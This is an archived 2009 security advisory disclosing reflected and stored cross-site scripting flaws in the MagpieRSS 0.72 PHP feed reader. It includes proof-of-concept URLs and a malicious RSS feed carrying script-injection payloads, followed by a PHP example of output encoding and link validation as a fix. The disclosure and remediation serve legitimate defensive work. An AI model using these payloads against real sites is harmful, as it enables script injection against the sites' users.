
MagpieRSS Cross Site Scripting

08 May 2009. Reported by Justin C. Klein Keane. Type: packetstorm. Source: packetstormsecurity.com

MagpieRSS versions up to 0.72 contain multiple XSS vulnerabilities that allow remote attackers to inject arbitrary web script or HTML via the URL.

Code
`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
- -= MagpieRSS Multiple XSS Vulnerabilities =-  
  
May 6, 2009  
Author: Justin C. Klein Keane <[email protected]>  
Software: MagpieRSS (http://magpierss.sourceforge.net/)  
Version Tested: magpierss-0.72  
Vendor notified  
Full details can also be found at  
http://lampsecurity.org/magpierss-vulnerability  
  
  
MagpieRSS (http://magpierss.sourceforge.net/) is a PHP based RSS reader.  
"MagpieRSS is compatible with RSS 0.9 through RSS 1.0. Also parses RSS  
1.0's modules, RSS 2.0, and Atom. (with a few exceptions)." Magpie  
suffers from multiple cross site scripting (XSS) vulnerabilities. The  
first class of vulnerability is due to the failure to sanitize URL  
variables in scripts included with the MagpieRSS distribution.  
Specifically the $url variable is crafted from $_GET['url'] and used in  
display to users in:  
  
magpierss-0.72/scripts/magpie_simple.php  
magpierss-0.72/scripts/magpie_debug.php  
  
The file magpierss-0.72/scripts/magpie_slashbox.php uses the same $url  
variable, but cast from $_GET['rss_url'].  
  
The second class of XSS results from MagpieRSS' failure to sanitize any  
of the RSS feeds it draws using magpierss-0.72/rss_fetch.inc. This  
could result in cross site scripting vulnerabilities being injected by  
malicious RSS feeds.  
  
- -=Proof of concept=-  
  
The following links can be used to trigger XSS in Magpie's sample scripts:  
  
http://192.168.0.2site/magpierss-0.72/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert(%27xss%27);%3C/script  
http://192.168.0.2/magpierss-0.72/scripts/magpie_simple.php?url=%22%3E%3Cscript%3Ealert(%27xss%27);%3C/script  
  
The following malicious RSS feed can be used to exploit Magpie's RSS  
rendering:  
  
<?xml version="1.0" encoding="utf-8"?>  
<rss version="2.0" xml:base="http://justin.madirish.net"  
xmlns:dc="http://purl.org/dc/elements/1.1/">  
<channel>  
<title>Justin.MadIrish.net <script>alert('xss title');</script>-  
Justin's Personal Homepage</title>  
<link>http://justin.madirish.net</link>  
<description>Close personal friends with Evil Eve.</description>  
<language>en</language>  
  
<item>  
<title>Disturbing<script>alert('xss title');</script>  
XSS<script>alert('xss title');</script></title>  
<link>http://justin.madirish.net/node/343 <script>alert('xss  
link');</script></link>  
<description>foobar</description>  
<pubDate>Wed, 04 Mar 2009 13:42:09 +0000</pubDate>  
<dc:creator>justin</dc:creator>  
<guid isPermaLink="false">343 at http://justin.madirish.net</guid>  
  
</item>  
</channel>  
</rss>  
  
- --  
Justin C. Klein Keane  
http://www.MadIrish.net  
http://www.LAMPSecurity.org  
  
`
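
Both classes of flaw in the advisory, the reflected `$_GET['url']` value and the unsanitized feed fields, are closed by encoding at output time plus a scheme check on links. The PHP below is an added example, not code from MagpieRSS or from the advisory's author; the helper names `h`, `safe_http_url` and `render_item` are hypothetical and the sample inputs are constructed from the advisory's proof of concept.

```php
<?php
// Added example, not MagpieRSS code. Helper names are hypothetical.

// Encode untrusted text for an HTML body or a quoted attribute value.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Return the URL only if it is a well-formed http(s) URL, otherwise null.
// Encoding alone would still let a javascript: URL through in an href.
function safe_http_url(string $url): ?string
{
    $url = trim($url);
    if (filter_var($url, FILTER_VALIDATE_URL) === false) {
        return null;
    }
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    return in_array($scheme, ['http', 'https'], true) ? $url : null;
}

// Render one feed item; title and link are both treated as hostile.
function render_item(array $item): string
{
    $title = h($item['title'] ?? '');
    $link  = safe_http_url($item['link'] ?? '');
    return $link === null
        ? "<li>$title</li>"
        : '<li><a href="' . h($link) . '">' . $title . '</a></li>';
}

// Constructed inputs modelled on the advisory's query string and feed item.
$url  = '"><script>alert(\'xss\');</script>';
$item = [
    'title' => "Disturbing<script>alert('xss title');</script>",
    'link'  => "http://justin.madirish.net/node/343 <script>alert('xss link');</script>",
];

// The query-string value is echoed back into a form field: encode it.
echo '<input type="text" name="url" value="' . h($url) . '">', "\n";
// The item link contains spaces, so it fails validation and the title is
// rendered as inert text without an anchor.
echo '<ul>', render_item($item), '</ul>', "\n";
```

`FILTER_VALIDATE_URL` does not reject `<`, `>` or `"` on its own, which is why the accepted link is still passed through `h()` before it reaches the `href` attribute.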
